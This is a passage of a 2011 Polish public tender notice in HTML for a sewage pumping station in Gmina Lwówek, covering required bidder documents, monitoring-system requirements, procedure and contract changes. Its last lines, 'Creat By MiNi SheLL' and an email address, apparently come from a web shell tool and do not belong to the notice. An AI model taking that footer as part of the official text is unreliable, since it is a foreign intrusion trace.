<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wyposażenie pompowni w system sterowników do przesyłania danych (przesyłanie wiadomości SMS oraz obustronna transmisja danych, oprogramowanie diagnostyczne służące do przesyłania komunikatów o stanach awaryjnych i przedawaryjnych obligatoryjnie musi spełniać warunek kompatybilności z montowanymi systemami w budowanej sieci kanalizacji sanitarnej w Gminie Lwówek, miejscowości Bródki, Chmielinko, Józefowo (Etap Chmielinko, Józefowo).                                                                                                 (Ze względu na przyszłe koszty eksploatacyjne jak i funkcjonalne całego systemu kanalizacji sanitarnej oraz sprawność działania całego układu, przyjęty przez wykonawców system sterowników i oprogramowania winien być zgodny (współdziałający) z tym, który jest zamontowany w obecnie budowanej części sieci kanalizacyjnej).                                                                                            Wymagania minimalne (o parametrach nie gorszych jak przedstawione) dotyczące systemu monitoringu i wizualizacji przepompowni ścieków w technologii GPRS zostały przedstawione w zał. nr 12 do siwz.                                                                                          
Wykonawca przystępujący do postępowania w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia jak i spełnienia wymagań określonych w niniejszej siwz winien przedstawić w swojej ofercie opis systemu, urządzeń technicznych i zastosowanego oprogramowania i wykazać, że przyjęte przez niego rozwiązania mogą bez przeszkód współpracować z już przyjętymi rozwiązaniami i nie będą generować dodatkowych kosztów i utrudnień dla Zamawiającego wynikających z przyjętych przez Wykonawcę rozwiązań.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 

Zmiana terminu realizacji przedmiotu umowy. 
1. Zmiany terminu wykonania zamówienia w następujących przypadkach: - wystąpienia siły wyższej. Siła wyższa oznacza wydarzenia nieprzewidywalne i poza kontrolą Stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązywania się z umowy w jej obecnym brzmieniu;                                                                                                                                                    - innych uzasadnionych przyczyn pod warunkiem, że zaszły okoliczności których nie można było przewidzieć w chwili zawarcia umowy.                                                                                            
2. Zmian przewidzianych w Prawie budowlanym:                                                                                               1) art. 23, pkt 1, jeżeli są uzasadnione koniecznością zwiększenia bezpieczeństwa wykonania robót budowlanych lub usprawnianie procesu budowy,                                                                                                    2) art. 20, ust. 1, pkt 4, lit. B - po uzgodnieniu możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub inspektora nadzoru inwestorskiego, albo                                                                                                                                     3) gdy zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę w ramach art. 36a, ust. 5 lub dokonane zostały zgodnie z zapisami art. 36a, ust. 6 ustawy z zastrzeżeniem art. 57, ust. 2 prawo budowlane.                                                                                                                                                  
3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności:               1) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej usprawniających funkcjonowanie całego układu rozbudowy i modernizacji,                                                             2) odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń instalacji lub obiektów infrastrukturalnych.                                                                    W przypadku wystąpienia okoliczności wymienionej powyżej termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.                                                          W razie nie zgłoszenia przez Wykonawcę zamawiającemu w terminie nie później niż 3 dni od zaistnienia wyżej wskazanych wyżej przyczyn i okoliczności, Wykonawca zobowiązany będzie do dotrzymania terminów umownych.    
5. Rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone o ilość robót niewykonanych na bazie kosztowej wskazanej w kosztorysie ofertowym. Ewentualne wyłączenia robót, realizowane będą na podstawie zatwierdzonych przez Zamawiającego protokołów konieczności. Za roboty wyłączone, strony ustalają wynagrodzenie na podstawie zatwierdzonego przez Zamawiającego kosztorysu sporządzonego przez Wykonawcę z zastosowaniem cen jednostkowych i wskaźników, określonych w kosztorysie ofertowym, sprawdzonego przez Inspektora Nadzoru.                                                                       
6. Wystąpienie robót zamiennych: ewentualne roboty zamienne, realizowane będą na podstawie zatwierdzonych przez inspektora nadzoru inwestorskiego i Zamawiającego protokołów konieczności oraz wprowadzeniu uzasadnionych zmian przez Projektanta.                                                                                                                                                    
7. Wystąpienie robót dodatkowych niezbędnych do prawidłowego wykonania realizowanego zamówienia. W przypadku wystąpienia okoliczności stanowiących podstawę zmian postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, nie później niż w dniu następnym od zaistnienia przyczyn do wykonania robot dodatkowych, poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie zmian w przedmiotowej umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lwowek.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, 64-310 Lwówek, pokój nr 10, bezpłatnie wersja papierowa siwz z załącznikami, dokumentacja techniczna na nośniku elektronicznym - płyta CD.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2011 godzina 10:00, miejsce: W siedzibie Zamawiającego -                     Urząd Miasta i Gminy w Lwówku, ul. Ratuszowa 2, pokój nr 5 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zamierza uzyskać dofinansowanie z Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 z działania Odnowa i rozwój wsi oraz Podstawowe usługi dla gospodarki i ludności wiejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com